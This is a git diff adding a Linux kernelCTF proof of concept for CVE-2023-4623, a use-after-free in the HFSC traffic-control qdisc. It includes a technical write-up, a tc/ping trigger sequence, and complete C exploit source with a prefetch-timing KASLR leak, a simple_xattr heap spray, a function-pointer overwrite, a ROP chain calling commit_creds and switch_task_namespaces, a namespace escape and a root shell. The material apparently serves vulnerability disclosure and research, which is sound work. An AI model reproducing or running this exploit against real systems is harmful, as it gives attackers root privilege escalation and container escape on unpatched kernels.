diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/exploit.md new file mode 100644 index 00000000..78757bb4 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/exploit.md @@ -0,0 +1,184 @@ +## Overview + +The vulnerability leads to a use-after-free on an `hfsc_class` object in `hfsc_dequeue()`. By replacing the vulnerable `hfsc_class` with a crafted `simple_xattr`, we can make `hfsc_dequeue()` perform a write-what-where. This is used to overwrite a function pointer in the kernel's `.data` section that is then called to execute a ROP chain and escape the namespace. The kernel base slide, which is needed to determine the write primitive's target address and ROP gadget addresses, is leaked using a prefetch timing side-channel. + +## Setup + +The exploit enters a network namespace as root in order to get `CAP_NET_ADMIN`: + +``` +unshare(CLONE_NEWUSER); +unshare(CLONE_NEWNET); +``` +A temporary file is opened to attach attributes to for the `simple_xattr` spray: +``` +xattr_fd = open("/tmp/", O_TMPFILE | O_RDWR, 0664); +``` +If the kernel base is not provided, `kaslr_leak()` leaks it using a prefetch side-channel (see final section for details). + +## Triggering the Vulnerability + +To trigger the vulnerability, we need to set up an HFSC qdisc and send packets to it. We will need to open two types of sockets: an `AF_NETLINK` socket for configuring the qdisc and an `AF_INET` socket for enqueueing packets at the qdisc. The qdisc is set up on `lo` by sending preconstructed messages to the Netlink socket. The `tf_msg` struct is used to represent the Netlink route messages, which are constructed in `init_nl_msgs()`. The following sequence of messages is sent: + +- `if_up_msg` sets `lo` up so that packets can be sent to the qdisc. +- `newqd_msg` attaches an HFSC qdisc to `lo`. +- `new_rsc_msg` adds a class with an RSC (real-time service curve) to the qdisc as a child of the root class. +- `new_fsc_msg` adds a class with an FSC (link-sharing service curve) to the qdisc as a child of the RSC class. +- At this point an `AF_INET` socket is opened and written to with `loopback_send()`. The message will be enqueued in the FSC class, causing the RSC class to be mistakenly added to the root class's `vt_tree`. +- `delc_msg` deletes the FSC class, then another `delc_msg` deletes the RSC class, leaving a dangling pointer to the underlying `hfsc_class` object in the root class's `vt_tree`. + +## Write-What-Where + +The use-after-free is reached via [`hfsc_dequeue()`](https://elixir.bootlin.com/linux/v6.1.36/source/net/sched/sch_hfsc.c#L1570 "https://elixir.bootlin.com/linux/v6.1.36/source/net/sched/sch_hfsc.c#L1570"), which calls `vttree_get_kminvt()`: + +``` +static struct hfsc_class * +vttree_get_minvt(struct hfsc_class *cl, u64 cur_time) +{ + /* if root-class's cfmin is bigger than cur_time nothing to do */ + if (cl->cl_cfmin > cur_time) + return NULL; + + while (cl->level > 0) { + cl = vttree_firstfit(cl, cur_time); + if (cl == NULL) + return NULL; + /* + * update parent's cl_cvtmin. + */ + if (cl->cl_parent->cl_cvtmin < cl->cl_vt) + cl->cl_parent->cl_cvtmin = cl->cl_vt; + } + return cl; +} +``` + +The loop will eventually assign our dangling pointer to `cl`. Then the line +``` +cl->cl_parent->cl_cvtmin = cl->cl_vt; +``` +gives us an 8-byte write-what-where primitive with the restriction that the value written is greater than what it is replacing. This primitive will be used to overwrite the `qfq_qdisc_ops.change()` function pointer in the kernel's `.data` section with a JOP gadget. Since the QFQ qdisc does not define a change function, `qfq_qdisc_ops.change()` is initially `NULL` and can be overwritten with any value. + +A `simple_xattr` is used to store the target address and value. The exploit uses `spray_simple_xattrs()` to add attributes to a temporary file, which sprays the `kmalloc-1024` cache where the vulnerable `hfsc_class` is located with `simple_xattr` objects. + +The `value` field of `simple_xattr` is filled with a fake `hfsc_class`. The following fields have to be faked: + +- `cl_parent`: The address to write to minus `offsetof(hfsc_class, cl_cvtmin)`. Set to the address of `qfq_qdisc_ops.change()`. +- `cl_vt`: The 8-byte value to write. Set to the address of a JOP gadget. +- `cl_f`: Set to zero to satisfy the `p->cl_f <= cur_time` condition in `vttree_firstfit()`. +- `level`: Set to a non-zero value to prevent `vttree_get_minvt()` from returning the dangling pointer and causing further use-after-frees. +- `vt_node`: This is the red-black tree node that the vulnerable class is accessed through. We make this a black node with `NULL` children to prevent crashes in `init_vf()` and `vttree_get_minvt()`. +- `vt_node.__rb_parent_color`: Set to 1, coloring the node black. +- `vt_node.rb_right`: Set to `NULL` so that it is not dereferenced. +- `vt_node.rb_left`: Set to `NULL` so that it is not dereferenced. +- `cf_node`: There is another dangling pointer to the vulnerable class from root class's `cf_tree`. This is filled in the same way as `vt_node` to prevent a crash in `init_vf()` but is not otherwise relevant. + +Once a `simple_xattr` has been allocated over the vulnerable `hfsc_class`, another FSC class is created with `new_fsc_msg` so that the qdisc has somewhere to enqueue packets (`hfsc_dequeue()` will return early if the qdisc is empty.) The write-what-where in `hfsc_dequeue()` is then triggered by sending an `AF_INET` packet with the `loopback_send()` helper function. + +## ROP Chain + +Now that `qfq_qdisc_ops.change()` has been overwritten, it can be called by sending the `new_qfq_qdisc` message to a Netlink socket. The kernel will then call the overwritten pointer from `qdisc_change()` with `rsi` pointing to the middle of sent message. The data around `rsi` is attacker controlled and contains the ROP chain. + +The `new_qfq_qdisc` message is constructed with two consecutive `TCA_OPTIONS` attributes, each of which consists of a 4-byte `rtattr` header followed by a data buffer. When the overwritten function is called, `rsi` will point to the second attribute, whose data buffer stores a ROP chain copied from `rop_buf`. The preceding attribute's buffer contains a single gadget, copied from `jop_buf` and found at `rsi - 0x70` when the chain is executed. + +The chain starts by calling the JOP gadget stored at `qfq_qdisc_ops.change()`: +``` +push rsi ; jmp qword ptr [rsi - 0x70] +``` +The gadget at `rsi - 0x70` then completes the stack pivot to the ROP chain at `rsi + 8` (the offset of `8` is needed to skip the `rtattr` header): +``` +pop rsp ; pop rbx ; jmp __x86_return_thunk // rsi - 0x70 +``` +The ROP chain starts by copying `rdi` into `rbx`, which restores `rbx`'s previous value: +``` +push rdi ; pop rbx ; pop rbp ; jmp __x86_return_thunk // rsi + 0x8 +0 +``` +This is necessary becuase the chain will eventually return back to the kernel stack and `rbx` is callee saved. After this the usual privilege escalation and namespace escape is performed using `commit_creds()` and `switch_task_namespaces()`: +``` +pop rdi ; jmp __x86_return_thunk +0 +prepare_kernel_cred() +pop rcx ; jmp __x86_return_thunk +commit_creds() +mov rdi, rax ; jmp __x86_indirect_thunk_rcx +pop rdi ; jmp __x86_return_thunk +1 +find_task_by_vpid() +pop rsi ; jmp __x86_return_thunk +init_ns_proxy +pop rcx ; jmp __x86_return_thunk +switch_task_namespaces() +mov rdi, rax ; jmp __x86_indirect_thunk_rcx +``` + +The ROP chain ends by pivoting back to the previous frame on the kernel stack. A kernel stack pointer can be read from `r14` on the LTS instance and `r13` on the COS instance. An offset of `-384` or `-368` is added to this pointer to get the location of the target frame on LTS and COS, respectively. Here are the the gadgets for LTS: + +``` +mov rax, r14 ; pop r14 ; jmp __x86_return_thunk +0 +pop rdx ; jmp __x86_return_thunk +pop r14 ; jmp __x86_return_thunk +push rax ; jmp __x86_indirect_thunk_rdx +pop rcx ; jmp __x86_return_thunk +-384 +add rax, rcx ; jmp __x86_return_thunk +pop rdx ; jmp __x86_return_thunk +pop rsp ; jmp __x86_return_thunk +push rax ; jmp __x86_indirect_thunk_rdx +``` +and COS: +``` +mov rax, r13 ; pop r13 ; pop rbp ; jmp __x86_return_thunk +0 +0 +pop rsi ; jmp __x86_return_thunk +-368 +add rax, rsi ; jmp __x86_return_thunk +pop rdx ; jmp __x86_return_thunk +pop rsp ; jmp __x86_return_thunk +push rax ; jmp __x86_indirect_thunk_rdx +``` +## Infoleak with Prefetch Timing Side-channel + +A simple implementation the prefetch timing side-channel (described in this [P0 blog post](https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html "https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html") and originally from this [paper](https://gruss.cc/files/prefetch.pdf "https://gruss.cc/files/prefetch.pdf") by Daniel Gruss et al.) is used to bypass KASLR. This side-channel exploits timing differences in `prefetch` instructions based on whether the target address is mapped and the cache state. + +Addresses which are mapped and have been recently accessed have a faster prefetch time than unmapped addresses (`prefetch` itself does not count as an access here). We access `sys_getuid()` by calling `getuid()` and then measure prefetch times for all possible locations of `sys_getuid()`. The target instance's kernel base is always located at a `0x1000000` aligned address between `0xffffffff81000000` and `0xffffffffbb000000`, so there are 59 candidate addresses to test. + +The attack first finds the minimum prefetch time `min` for the unmapped address `0xffffffff80000000`. Prefetch times for other unmapped addresses will likely be greater than or equal to to `min`, so any address with a faster prefetch time is assumed to be mapped. The lowest mapped address found this way is taken to be the kernel base. + + + +``` +#define MIN_STEXT 0xffffffff81000000 +#define MAX_STEXT 0xffffffffbb000000 +#define BASE_INC 0x1000000 + +long kaslr_leak (int tries1, int tries2) { + long base = -1, addr; + size_t time; + size_t min = -1; + + addr = 0xffffffff80000000; + for (int i = 0; i < tries1; i++) { + time = onlyreload(addr); + min = min < time ? min : time; + } + + for (int i = 0; i < tries2; i++) { + for (addr = MIN_STEXT; addr <= MAX_STEXT; addr += BASE_INC) { + time = onlyreload(addr + SYS_GETUID); + if (time < min && addr < base) { + base = addr; + } + } + } + return base; +} +``` + +The prefetch timing assembly code in `onlyreload()` is taken from Daniel Gruss's [repository](https://github.com/IAIK/prefetch "https://github.com/IAIK/prefetch") with `cpuid` replaced by `mfence` as suggested in the P0 blog post. + +The original exploit did not preload the target address, but the leak will not work reliably without this on the current server (likely due to increased cache activity). + +This implementation of the side-channel works on the Intel Xeon CPU used by the live instance but not the AMD CPU used by the exploit_repro instance, since there is no timing difference between the two cases it tests for on AMD. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/vulnerability.md new file mode 100644 index 00000000..313bb70e --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/vulnerability.md @@ -0,0 +1,35 @@ +## Vulnerability Details + +There is a use-after-free in the traffic control system's HFSC qdisc when a HFSC class with link-sharing has a parent without link-sharing. When a packet is enqueued at the the child class, `init_vf()` will call `vttree_insert()` on the parent. However, when the packet is dequeued, `vttree_remove()` will be skipped in `update_vf()` since the parent does not have the `HFSC_FSC` flag set. This leaves a dangling pointer which can be exploited to cause a use-after-free and achieve privilege escalation. + +The vulnerability has been present since the HFSC qdisc was introduced in kernel version 2.6.3. It was fixed in version 6.5 with commit `b3d26c5702c7 ("net/sched: sch_hfsc: Ensure inner classes have fsc curve")`. This commit made it impossible for classes without link-sharing curves to become parents, since only inner classes with link-sharing curves are meaningful in the HFSC protocol. + +Triggering the vulnerability requires `CONFIG_NET_SCH_HFSC` to be enabled in the kernel configuration. The user must have the `CAP_NET_ADMIN` capability to trigger the vulnerability, which can be gained with access to unprivileged user namespaces. Disabling unprivileged user namespaces prevents the vulnerability from being exploited for privilege escalation. + +## POC +``` +# Set lo up +ip link set lo up + +# Create the HFSC qdisc and root class. +tc qdisc add dev lo parent root handle 1: hfsc def 2 + +# Add a real-time class as a child of root class. +tc class add dev lo parent 1: classid 1:1 hfsc rt umax 1 dmax 1 rate 1 + +# Add a link-sharing class as a child of the real-time class. +tc class add dev lo parent 1:1 classid 1:2 hfsc ls umax 1 dmax 1 rate 1 + +# Enqueue packet at link-sharing class, which calls init_vf() on it. +ping -c1 localhost + +# Delete the parent and child classes, leaving a dangling pointer. +tc class del dev lo classid 1:2 +tc class del dev lo classid 1:1 + +# Add a link-sharing class to enqueue packets to (if the queue is empty, hfsc_dequeue() will return before reaching the UaF) +tc class add dev lo parent 1: classid 1:2 hfsc ls umax 1 dmax 1 rate 1 + +# Trigger use after free in hfsc_dequeue() +ping -c1 localhost +``` \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/Makefile b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/Makefile new file mode 100644 index 00000000..0a07db56 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/Makefile @@ -0,0 +1,6 @@ +CFLAGS = -Wno-incompatible-pointer-types -Wno-format -static + +exploit: exploit.c + +run: + ./exploit diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit new file mode 100644 index 00000000..fc4f3b4c Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit.c b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit.c new file mode 100644 index 00000000..66f15079 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit.c @@ -0,0 +1,479 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* Prefetch kaslr leak */ +#define MIN_STEXT 0xffffffff81000000 +#define MAX_STEXT 0xffffffffbb000000 +#define BASE_INC 0x1000000 +#define SYS_GETUID 0x0f41c0 + +/* simple_xattr spray */ +#define XATTR_SPRAY 32 +#define XATTR_HEADER_SIZE 32 +#define XATTR_SLAB_LEN 1024 +#define XATTR_DATA_LEN (XATTR_SLAB_LEN/2) + +/* hfsc_class offsets */ +#define LEVEL_OFFSET 92 +#define CL_PARENT_OFFSET 104 +#define VT_NODE_OFFSET 184 +#define CF_NODE_OFFSET 216 +#define CL_VT_OFFSET 272 +#define CL_CVTMIN_OFFSET 304 + +/* Data offsets */ +#define INIT_NSPROXY 0x22670c0 +#define QFQ_CHANGE_QDISC_LOC 0x25106f8 + +/* Function offsets */ +#define PREPARE_KERNEL_CRED 0x10b5e0 +#define COMMIT_CREDS 0x10b360 +#define FIND_TASK_BY_VPID 0x102440 +#define SWITCH_TASK_NAMESPACES 0x109830 + +/* Gadget offsets */ +#define PUSH_RSI_JMP_QWORD_PTR_RSI_MINUS_0x70 0xba80ec +#define PUSH_RDI_POP_RBX_RET_THUNK 0x74cf18 +#define POP_RSP_POP_RBX_RET_THUNK 0x791fcf +#define POP_RDI_RET_THUNK 0x117d6f +#define POP_RSI_RET_THUNK 0x177d1c +#define POP_RDX_RET_THUNK 0x06238d +#define POP_RCX_RET_THUNK 0x02582c +#define MOV_RDI_RAX_THUNK_RCX 0x34d9cd + +#define MOV_RAX_R13_POP_RBX_POP_RBP_RET_THUNK 0x58391d +#define ADD_RAX_RSI_RET_THUNK 0x077d1a +#define PUSH_RAX_JMP_RDX_THUNK 0x832707 +#define POP_RSP_RET_THUNK 0x1c7db8 + + +#define err_exit(s) do { perror(s); exit(EXIT_FAILURE); } while(0) + +struct tf_msg { + struct nlmsghdr nh; + struct tcmsg tm; +#define TC_DATA_LEN 512 + char attrbuf[TC_DATA_LEN]; +}; + +struct if_msg { + struct nlmsghdr nh; + struct ifinfomsg ifi; +}; + +/* Netlink message for setting loopback up. */ +struct if_msg if_up_msg = { + { + .nlmsg_len = 32, + .nlmsg_type = RTM_NEWLINK, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .ifi_family = AF_UNSPEC, + .ifi_type = ARPHRD_NETROM, + .ifi_index = 1, + .ifi_flags = IFF_UP, + .ifi_change = 1, + }, + +}; + + +int xattr_fd; +char rop_buf[512]; +char jop_buf[0x70]; + +void pin_cpu (int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + if (sched_setaffinity(0, sizeof(set), &set)) + err_exit("[-] sched_setaffinity"); +} + +/* + * Prefetch timing code from Daniel Gruss. + * https://github.com/IAIK/prefetch + */ + +inline __attribute__((always_inline)) size_t rdtsc_begin () { + size_t a, d; + asm volatile ( + "mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +inline __attribute__((always_inline)) size_t rdtsc_end () { + size_t a, d; + asm volatile( + "xor %%rax, %%rax\n\t" + "mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +void prefetch (void* p) { + asm volatile ("prefetchnta (%0)" : : "r" (p)); + asm volatile ("prefetcht2 (%0)" : : "r" (p)); +} + +size_t onlyreload (void* addr) { + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +/* + * Simple implementation of prefetch sidechannel to + * bypass KASLR. + */ + +long kaslr_leak (int tries1, int tries2) { + long base = -1, addr; + size_t time; + size_t min = -1; + + addr = 0xffffffff80000000; + for (int i = 0; i < tries1; i++) { + time = onlyreload(addr); + min = min < time ? min : time; + } + + for (int i = 0; i < tries2; i++) { + for (addr = MIN_STEXT; addr <= MAX_STEXT; addr += BASE_INC) { + time = onlyreload(addr + SYS_GETUID); + if (time < min && addr < base) { + base = addr; + } + } + } + return base; +} + +void init_rop (long *rop, long *jop, long kbase) { + *jop++ = kbase + POP_RSP_POP_RBX_RET_THUNK; + /* commit_creds(prepare_kernel_cred(0)) */ + *rop++ = kbase + POP_RDI_RET_THUNK; + *rop++ = 0; + *rop++ = kbase + PREPARE_KERNEL_CRED; + *rop++ = kbase + POP_RCX_RET_THUNK; + *rop++ = kbase + COMMIT_CREDS; + *rop++ = kbase + MOV_RDI_RAX_THUNK_RCX; + /* switch_task_namespaces(find_task_by_vpid(1, init_ns_proxy) */ + *rop++ = kbase + POP_RDI_RET_THUNK; + *rop++ = 1; + *rop++ = kbase + FIND_TASK_BY_VPID; + *rop++ = kbase + POP_RSI_RET_THUNK; + *rop++ = kbase + INIT_NSPROXY; + *rop++ = kbase + POP_RCX_RET_THUNK; + *rop++ = kbase + SWITCH_TASK_NAMESPACES; + *rop++ = kbase + MOV_RDI_RAX_THUNK_RCX; + /* return back to the original stack */ + *rop++ = kbase + MOV_RAX_R13_POP_RBX_POP_RBP_RET_THUNK; + rop++; + rop++; + *rop++ = kbase + POP_RSI_RET_THUNK; + *rop++ = (long)-0x170; + *rop++ = kbase + ADD_RAX_RSI_RET_THUNK; + *rop++ = kbase + POP_RDX_RET_THUNK; + *rop++ = kbase + POP_RSP_RET_THUNK; + *rop++ = kbase + PUSH_RAX_JMP_RDX_THUNK; +} + +/* Helper functions for creating rtnetlink messages. */ + +unsigned short add_rtattr (struct rtattr *rta, unsigned short type, unsigned short len, char *data) { + rta->rta_type = type; + rta->rta_len = RTA_LENGTH(len); + memcpy(RTA_DATA(rta), data, len); + return rta->rta_len; +} + +int vuln_class_id = 0x00010001; // 1:1, classid of vulnerable RSC parent. +int def_class_id = 0x00010002; // 1:2, classid where packets are enqueued. +struct tf_msg newqd_msg, delc_msg, new_rsc_msg, new_fsc_msg, new_qfq_qdisc; + +void init_tf_msg (struct tf_msg *m) { + m->nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + m->tm.tcm_family = PF_UNSPEC; + m->tm.tcm_ifindex = if_nametoindex("lo"); + m->nh.nlmsg_len = NLMSG_LENGTH(sizeof(m->tm)); +} + +void init_qdisc_msg (struct tf_msg *m) { + init_tf_msg(m); + m->nh.nlmsg_type = RTM_NEWQDISC; + m->tm.tcm_parent = -1; + m->tm.tcm_handle = 1 << 16; + m->nh.nlmsg_flags |= NLM_F_CREATE; + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("hfsc") + 1, "hfsc")); + struct rtattr *opts = (char *)m + NLMSG_ALIGN(m->nh.nlmsg_len); + short def = 2; + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_OPTIONS, 2, &def)); +} + + +void init_rsc_class_msg (struct tf_msg *m) { + init_tf_msg(m); + m->nh.nlmsg_type = RTM_NEWTCLASS; + m->tm.tcm_parent = 1 << 16; + m->tm.tcm_handle = vuln_class_id; + m->nh.nlmsg_flags |= NLM_F_CREATE; + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("hfsc") + 1, "hfsc")); + struct rtattr *opts = (char *)m + NLMSG_ALIGN(m->nh.nlmsg_len); + opts->rta_type = TCA_OPTIONS; + opts->rta_len = RTA_LENGTH(0); + int rsc[3] = {1, 1, 1}; + opts->rta_len += RTA_ALIGN(add_rtattr((char *)opts + opts->rta_len, TCA_HFSC_RSC, sizeof(rsc), rsc)); + m->nh.nlmsg_len += NLMSG_ALIGN(opts->rta_len); +} + +void init_fsc_class_msg (struct tf_msg *m) { + init_tf_msg(m); + m->nh.nlmsg_type = RTM_NEWTCLASS; + m->tm.tcm_parent = vuln_class_id; + m->tm.tcm_handle = def_class_id; + m->nh.nlmsg_flags |= NLM_F_CREATE; + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("hfsc") + 1, "hfsc")); + struct rtattr *opts = (char *)m + NLMSG_ALIGN(m->nh.nlmsg_len); + opts->rta_type = TCA_OPTIONS; + opts->rta_len = RTA_LENGTH(0); + int fsc[3] = {1, 1, 1}; + opts->rta_len += RTA_ALIGN(add_rtattr((char *)opts + opts->rta_len, TCA_HFSC_FSC, sizeof(fsc), fsc)); + m->nh.nlmsg_len += NLMSG_ALIGN(opts->rta_len); +} + +void init_del_class_msg (struct tf_msg *m) { + init_tf_msg(m); + m->nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + m->nh.nlmsg_type = RTM_DELTCLASS; + m->tm.tcm_handle = vuln_class_id; +} + +void init_qfq_qdisc_msg (struct tf_msg *m) { + init_tf_msg(m); + m->nh.nlmsg_type = RTM_NEWQDISC; + m->tm.tcm_parent = 0x00010002; + m->tm.tcm_handle = 2 << 16; + m->nh.nlmsg_flags |= NLM_F_CREATE; + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("qfq") + 1, "qfq")); + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_OPTIONS, sizeof(jop_buf), jop_buf)); + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_OPTIONS, sizeof(rop_buf), rop_buf)); +} + +void init_nl_msgs (void) { + init_qdisc_msg(&newqd_msg); + init_del_class_msg(&delc_msg); + init_rsc_class_msg(&new_rsc_msg); + init_fsc_class_msg(&new_fsc_msg); +} + +/* + * Send a Netlink message and check for error + */ +void netlink_write (int sock, struct tf_msg *m) { + struct { + struct nlmsghdr nh; + struct nlmsgerr ne; + } ack; + if (write(sock, m, m->nh.nlmsg_len) == -1) + err_exit("[-] write"); + if (read(sock , &ack, sizeof(ack)) == -1) + err_exit("[-] read"); + if (ack.ne.error) { + errno = -ack.ne.error; + perror("[-] netlink"); + } +} + +void netlink_write_noerr (int sock, struct tf_msg *m) { + if (write(sock, m, m->nh.nlmsg_len) == -1) + err_exit("[-] write"); +} + +/* + * Allocate simple_xattr objects. + */ +int num_xattr = 0; +char xattr_buf[XATTR_DATA_LEN]; +void spray_simple_xattrs(int num_spray) { + char name[32]; + for (int i = 0; i < num_spray; i++, num_xattr++) { + sprintf(name, "security.%d", num_xattr); + if (fsetxattr(xattr_fd, name, xattr_buf, XATTR_DATA_LEN, 0) == -1) + err_exit("[-] fsetxattr"); + } +} + +/* + * Send a message on the loopback device. Used to trigger qdisc enqueue and + * dequeue functions. + */ +void loopback_send (void) { + struct sockaddr iaddr = { AF_INET }; + int inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0); + if (inet_sock_fd == -1) + err_exit("[-] inet socket"); + if (connect(inet_sock_fd, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] connect"); + if (write(inet_sock_fd, "", 1) == -1) + err_exit("[-] inet write"); + close(inet_sock_fd); +} + +int main (int argc, char **argv) { + long kernel_base; + + pin_cpu(0); + + /* Get kernel base from command line or prefetch side channel */ + if (argc > 1) { + kernel_base = strtoul(argv[1], NULL, 16); + printf("[*] Using provided kernel base: %p\n", kernel_base); + } else { + printf("[*] Using prefetch to leak kernel base...\n"); + getuid(); + kernel_base = kaslr_leak(1000, 1000); + if (kernel_base == -1) { + printf("[*] Prefetch failed\n"); + exit(EXIT_FAILURE); + } + printf("[*] Leaked kernel base: %p\n", kernel_base); + } + + if (unshare(CLONE_NEWUSER) == -1) + err_exit("[-] unshare(CLONE_NEWUSER)"); + if (unshare(CLONE_NEWNET) == -1) + err_exit("[-] unshare(CLONE_NEWNET)"); + + /* Open temporary file to use for xattr spray */ + xattr_fd = open("/tmp/", O_TMPFILE | O_RDWR, 0664); + if (xattr_fd == -1) + err_exit("[-] open"); + + /* Open socket to send netlink commands to */ + int nl_sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (nl_sock_fd == -1) + err_exit("[-] nl socket"); + + /* Set loopback device up */ + if_up_msg.ifi.ifi_index = if_nametoindex("lo"); + netlink_write(nl_sock_fd, &if_up_msg); + + init_nl_msgs(); + + /* Trigger vuln */ + netlink_write(nl_sock_fd, &newqd_msg); + netlink_write(nl_sock_fd, &new_rsc_msg); + netlink_write(nl_sock_fd, &new_fsc_msg); + loopback_send(); + delc_msg.tm.tcm_handle = def_class_id; + netlink_write(nl_sock_fd, &delc_msg); + + printf("[*] Triggered vulnerability\n"); + + /* Place fake hfsc_class in xattr */ + + /* hfsc_class.level = 1 (must be non-zero) */ + xattr_buf[LEVEL_OFFSET - XATTR_HEADER_SIZE] = 1; + /* hfsc_class.vt_node = 1 (must be odd) */ + xattr_buf[VT_NODE_OFFSET - XATTR_HEADER_SIZE] = 1; + /* hfsc_class.cf_node = 1 (must be odd) */ + xattr_buf[CF_NODE_OFFSET - XATTR_HEADER_SIZE] = 1; + /* hfsc_class.parent = &qfq_change_qdisc (write target)*/ + long parent = kernel_base + QFQ_CHANGE_QDISC_LOC - CL_CVTMIN_OFFSET; + memcpy(xattr_buf + CL_PARENT_OFFSET - XATTR_HEADER_SIZE, &parent, 8); + /* hfsc_class.cl_vt = jop_gadget (write value) */ + long cl_vt = kernel_base + PUSH_RSI_JMP_QWORD_PTR_RSI_MINUS_0x70; + memcpy(xattr_buf + CL_VT_OFFSET - XATTR_HEADER_SIZE, &cl_vt, 8); + + printf("[*] Spraying simple_xattrs...\n"); + /* Spray simple_xattrs */ + delc_msg.tm.tcm_handle = vuln_class_id; + netlink_write(nl_sock_fd, &delc_msg); + spray_simple_xattrs(XATTR_SPRAY); + + /* Create new default class and trigger enqueue/dequeue to overwrite + * qfq_change_qdisc with jop gadget */ + new_fsc_msg.tm.tcm_parent = 1 << 16; + netlink_write(nl_sock_fd, &new_fsc_msg); + + printf("[*] Overwriting function pointer\n"); + loopback_send(); + + /* Prepare ROP chain at an offset of 4 bytes. With the 4-byte rtattr + header it will be at an 8-byte offset from rsi, allowing it to be reached + with `push rsi ; pop rsp ; pop rbx` for the stack pivot */ + init_rop(rop_buf + 4, jop_buf, kernel_base); + + /* Create QFQ qdisc */ + init_qfq_qdisc_msg(&new_qfq_qdisc); + netlink_write_noerr(nl_sock_fd, &new_qfq_qdisc); + + + /* Call overwritten function pointer */ + printf("[*] Triggering ROP chain\n"); + netlink_write_noerr(nl_sock_fd, &new_qfq_qdisc); + + if (getuid()) { + printf("[-] Privesc failed\n"); + exit(EXIT_FAILURE); + } + + printf("[+] Returned from ROP\n"); + + int mntns_fd = open("/proc/1/ns/mnt", O_RDONLY); + if (mntns_fd == -1) + perror("[-] open(/proc/1/ns/mnt)"); + + int netns_fd = open("/proc/1/ns/net", O_RDONLY); + if (netns_fd == -1) + perror("[-] open(/proc/1/ns/net)"); + + int pidns_fd = open("/proc/1/ns/pid", O_RDONLY); + if (pidns_fd == -1) + perror("[-] open(/proc/1/ns/pid)"); + + + if (setns(mntns_fd, CLONE_NEWNS) == -1) + perror("[-] setns mnt"); + if (setns(netns_fd, CLONE_NEWNET) == -1) + perror("[-] setns net"); + if (setns(pidns_fd, CLONE_NEWPID) == -1) + perror("[-] setns pid"); + + printf("[*] Launching shell\n"); + system("/bin/sh"); +} diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/Makefile b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/Makefile new file mode 100644 index 00000000..0a07db56 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/Makefile @@ -0,0 +1,6 @@ +CFLAGS = -Wno-incompatible-pointer-types -Wno-format -static + +exploit: exploit.c + +run: + ./exploit diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/exploit b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/exploit new file mode 100644 index 00000000..85dd53d4 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/exploit differ diff --git 